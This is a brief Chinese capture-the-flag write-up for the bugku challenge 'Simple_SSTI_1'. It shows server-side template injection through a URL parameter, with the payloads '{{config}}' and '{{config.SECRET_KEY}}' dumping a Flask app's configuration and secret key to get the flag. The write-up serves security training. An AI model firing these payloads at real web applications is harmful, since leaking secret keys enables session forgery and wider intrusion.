0
点赞
收藏
分享

微信扫一扫

[bugku]Simple_SSTI_1

扒皮狼 2022-03-12 阅读 70
安全

题目:
在这里插入图片描述

进入页面先按F12

在这里插入图片描述
有个提示secret_key
考虑模板注入

输入url:

http://114.67.175.224:10472/?flag={{config}}

在这里插入图片描述
直接找到了flag

如果访问

http://114.67.175.224:10472/?flag={{config.SECRET_KEY}}

可以直接显示flag
在这里插入图片描述

举报

相关推荐

BUGKU 变量1

ssti1--Flask框架

[bugku]-login1-sql约束攻击

SSTI漏洞基础解析

【bugku】-newphp

【Real】[Flask]SSTI

SSTI漏洞初手入门

0 条评论